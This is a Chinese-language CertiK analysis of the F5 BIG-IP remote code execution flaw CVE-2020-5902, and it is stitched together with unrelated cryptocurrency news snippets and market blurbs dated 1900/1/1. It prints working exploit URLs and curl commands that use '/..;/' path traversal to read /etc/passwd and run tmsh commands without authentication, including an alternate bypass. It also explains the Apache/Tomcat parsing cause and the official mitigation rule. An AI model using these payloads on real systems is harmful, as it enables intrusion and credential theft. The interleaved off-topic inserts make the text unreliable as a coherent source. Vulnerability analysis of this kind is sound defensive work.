前言
今日一早起來推特以及各大技術論壇上炸開了鍋,安全圈子的人都在討論F5設備里遠程代碼執行的漏洞。很多討論的內容,大部分是在分享如何尋找目標,利用漏洞,并沒有關于對漏洞成因的分析。CertiK的安全研究員下載了存在漏洞的程序,搭建環境復現漏洞后,對漏洞的起因進行了分析,并在下文分享給大家。
背景
F5BIG-IP是美國F5公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。PositiveTechnologies的研究人員MikhailKlyuchnikov發現其配置工具TrafficManagementUserInterface中存在遠程代碼執行漏洞,CVE編號為CVE-2020-5902。該漏洞CVSSv3評分為10分,攻擊者可利用該漏洞創建或刪除文件,關閉服務、執行任意的系統命令,最終獲得服務器的完全控制權。CVE具體表述請查看文章底部參考鏈接1。
受影響的BIG-IP軟件版本
漏洞利用
讀取任意文件:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
CertiK獲SUI頒發50萬美元漏洞賞金:金色財經報道,全球區塊鏈和智能合約安全團隊CertiK因發現一種新型安全威脅而被SUI授予50萬美元賞金。該威脅被命名為“HamsterWheel(倉鼠輪)”,并有可能破壞SUI整個Layer 1網絡。
在主網啟動前,CertiK向SUI報告了這一關鍵漏洞,并得到了SUI的確認與反饋。認識到情況的嚴重性后,SUI迅速實施了安全解決方案以緩釋這種攻擊的潛在威脅。目前SUI已推出修復措施用以確保其網絡安全。
SUI為了感謝CertiK,SUI支付了50萬美元用來獎勵這一關鍵性的發現。關于HamsterWheel攻擊的技術細節和對Layer 1更深層次的影響將會隨后披露給公眾。[2023/6/19 21:47:41]
遠程執行tmsh命令:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方給出的臨時修復方案(后文會對修復進行分析):
漏洞復現
Certik:正在探討180萬美金社區補償計劃以彌補Merlin DEX事件損失:金色財經報道,據Certik發文表示,在Merlin DEX的惡意開發者實施了Rug Pull后,正與受影響的各方緊密合作,彌補Merlin DEX事件造成的180萬美元用戶資金損失。據悉,CertiK將在未來幾天內宣布一個180萬美金的社區補償計劃以彌補損失,更多的計劃細節將會于隨后發布。
CertiK在對Merlin DEX的審計過程中發現了中心化風險,并對授予“masterAddress”和“owner”地址的權限進行了詳細的可視化分解。該審計工作于4月23日完成,共有六項發現。Merlin團隊修復了其中兩個問題,并確認了其余四個問題。CertiK的審計報告全部公開透明,并免費提供給所有Web3社區成員查看。
初步調查表明,攻擊者很可能位于歐洲。目前,Certik正在與執法部門合作,追蹤他們的下落。CertiK也正在與Merlin團隊的其他成員緊密合作并努力解決問題。目前,CertiK已敦促該惡意開發者接受20%的白帽賞金。[2023/4/27 14:29:05]
在F5的官網注冊賬號之后,可以從F5的資源庫中下載存在漏洞的BIG-IP軟件。訪問參考鏈接2可以下載BIG-IPTMOS(TrafficManagementOperatingSystem,流量管理操作系統)的虛擬機鏡像。CertiK技術團隊因為使用VmwareFusion,下載的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer”。
Larry Cermak:Customers Bank等銀行仍為加密行業提供服務:3月13日消息,The Block研究總監Larry Cermak發推稱,為加密貨幣業務提供銀行服務的三家美國銀行被淘汰。不過,Customers Bank、First Foundation Bank、Cross River Bank、Sutton Bank、Evolve Bank & Trust、BankProv、Quontic Bank等銀行仍然提供加密貨幣銀行服務。Larry Cermak表示,自己沒有提到像摩根大通、 紐約梅隆銀行這樣的大銀行,是因為大多數小企業都無法使用這些銀行。[2023/3/13 13:00:38]
在VmwareFusion中加載鏡像(import):
加載完成之后,使用默認用戶名密碼登陸系統:
用戶名:root
密碼:default
系統初始化之后,使用”ifconfig”命令查詢虛擬機IP地址。CertiK技術團隊的BIG-IPTMUI虛擬機IP地址為”172.16.4.137”。
在瀏覽器中訪問BIG-IPTMUI登陸界面:
Lancer Capital領投Matou Network為虛假消息:近日有投資者稱名為Matou Network發表其項目獲得Lancer Capital領投,經核實,Lancer Group 及Lancer Capital, Media,EDU等旗下其他業務機構均沒有開展與Matou Network任何形式的合作。特此聲明,望廣大投資人注意風險。[2021/3/23 19:09:29]
https://172.16.4.137/tmui/login.jsp
復現任意文件讀取:
在瀏覽器中訪問以下地址可以讀取”/etc/passwd”文件內容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
復現tmsh命令執行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Larry Cermak談“聘請0xMaki領導Sushi”:預先支付50萬SUSHI實在太多了:The Block研究總監、Sushiswap九名多簽見證人之一Larry Cermak發推就(Adam Cochran提議的)“聘請Sushiswap聯合創始人0xMaki全職領導項目”的提案表示:我完全支持給予創始人更多獎勵,但預先支付50萬SUSHI代幣實在太多了,我不會支持這個提案,我建議降低預先支付的金額,將更多資金改為長期支付。
注:此前,Cinneamhain Venutres合伙人Adam Cochran提交了一項提案投票,旨在聘請0xMaki來領導該項目。該提案指出,如果聘請0xMaki全職領導項目,將會:
1. 預先支付50萬SUSHI代幣,并在鎖定一份50萬SUSHI幣的創始人捐贈;
2. 如果兩年后繼續為SUSHI工作還會支付額外50萬SUSHI幣報酬。[2020/9/12]
漏洞分析
在進入漏洞分析前,先要明確一點:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用戶登陸后本身是可以被訪問的。
下面的截圖顯示了登陸前和登陸后訪問以下URL的區別:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
登陸前訪問:
被跳轉回登陸界面
輸入賬號密碼登陸管理界面之后再訪問,可執行fileRead.jsp讀取文件。
fileRead.jsp和tmshCmd.jsp雖然是在PoC中最終被利用的文件,但是他們并不是漏洞的起因。此漏洞的本質是利用Apache和后臺Java(tomcat)對URL的解析方式不同來繞過登陸限制,在未授權的情況下,訪問后臺JSP模塊。CertiK技術人員第一次注意到此類型漏洞是在2018年Orange的BlackHat演講:“BreakingParserLogicTakeYourPathNormalizationOffandPop0DaysOut”.這里可以查看演講稿件(參考鏈接2)。
這里我們可以理解在F5BIG-IP的后臺服務器對收到了URL請求進行了兩次的解析,第一次是httpd(Apache),第二次是后一層的Java(tomcat).
在URL在第一次被Apache解析時,Apache關注的是URL的前半段https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
當Apache在看見前半段是合法URL且是允許被訪問的頁面時,就把它交給了后面的第二層。Apache在這里完全把URL里面關鍵的/..;/給無視了。
在URL在第二次被解析時,后面的Java(tomcat)會把/..;/理解為,向上返回一層路徑。此時,/login.jsp/和/..;/會抵消掉。Tomcat看到的真正請求從
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
變成了:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
再來fileRead.jsp并沒有對收到的請求進行身份驗證,后臺因此直接執行fileRead.jsp,讀取并返回了/etc/passwd文件的內容。
根據以上的思路,其實可以找出別的利用漏洞的URL,比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
這里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一樣,是一個不需要登陸就能訪問的頁面。但是因為要向上返回兩次,需要用兩個/..;/來抵消掉”/login/legal.html”。
回到開頭提到的官方給出的臨時修復方案,修復方案的本質是在httpd的配置中添加以下規則:
include'
<LocationMatch".*\\.\\.;.*">
Redirect404/
</LocationMatch>
'
這個規則的意思是,當http服務器在監測到URL中包含..;(句號句號分號)的時候,直接返回404.這樣利用漏洞的請求就沒辦法到達后臺(第二層)了。
如何避免漏洞:
此漏洞的利用方式在網絡上公開之后,因為它的攻擊成本低廉,大批黑客都開始圖謀利用此漏洞攻擊使用F5BIG-IP產品的系統。黑客只需要付出極小的代價就能獲得目標系統的控制權,對系統產生巨大的破壞。
俗話說:“不怕賊偷,就怕賊惦記”。即便這樣的黑客攻擊事件這次沒有發生在你身上,不代表你是安全的。因為很有可能黑客的下一個目標就是你。
而Certik的專業技術團隊會幫你徹底打消這種“賊惦記”的擔憂。CertiK專業滲透測試團隊會通過對此類事件的監測,第一時間給客戶提交漏洞預警報告,幫助客戶了解漏洞細節以及防護措施。此舉可以確保客戶的系統不受攻擊并且不會遭受財產損失。
同時作為一名安全技術人員,在新漏洞被發現的時,不僅需要知道漏洞是如何被黑客利用的,更要去探尋漏洞背后的原因,方可積累經驗,更加有能力在復雜的系統中發現隱藏的漏洞。
CertiK以及其技術人員,將永遠把安全當做信仰,與大家一同學習并一同成長。
參考鏈接
1.https://cve.mitre.org/
2.https://downloads.f5.com/
3.https://i.blackhat.com/
轉眼一周的時間又過去了,今天又到了周一,最近比特幣行情其實沒有什么好分析的,市場上有人看多,有人看空,但是行情卻很堅挺.
1900/1/1 0:00:00近日,在一條推文中,CryptoQuant高管表示,依照2018年和2019年的數據看,當鯨魚成群結隊地將BTC移出交易所時,四個月后便可能迎來一個新的比特幣牛市,比特幣將開始大幅上漲.
1900/1/1 0:00:00市場要聞 1、韓國國會討論新稅法,或對加密貨幣征最高20%資本利得稅。2、灰度DLC基金上調BTC和ETH權重,下調XRP、BCH及LTC權重.
1900/1/1 0:00:007月8日,2020線上智博會區塊鏈應用創新大賽在重慶啟動。大賽為期2個多月,以“渝你相鏈,互信共贏”為主題,旨在聚合區塊鏈優質資源,遴選區塊鏈應用優秀解決方案,賦能重慶打造區塊鏈產業高地與智慧名.
1900/1/1 0:00:00區塊鏈勢頭日漸迅猛,國家及各部委出臺相關政策20余項,超過30個省市地區發布區塊鏈政策指導文件,以北京為例,半年多時間,全市區塊鏈政務領域已落地140個具體場景應用.
1900/1/1 0:00:00昨日整個白天,比特幣價格整體維持上行,雖然未創出新高,但在前期漲幅這么快且大的情況下,還能維持最頂部位置的震蕩,本身就只比繼續突破的強勢稍微差一些.
1900/1/1 0:00:00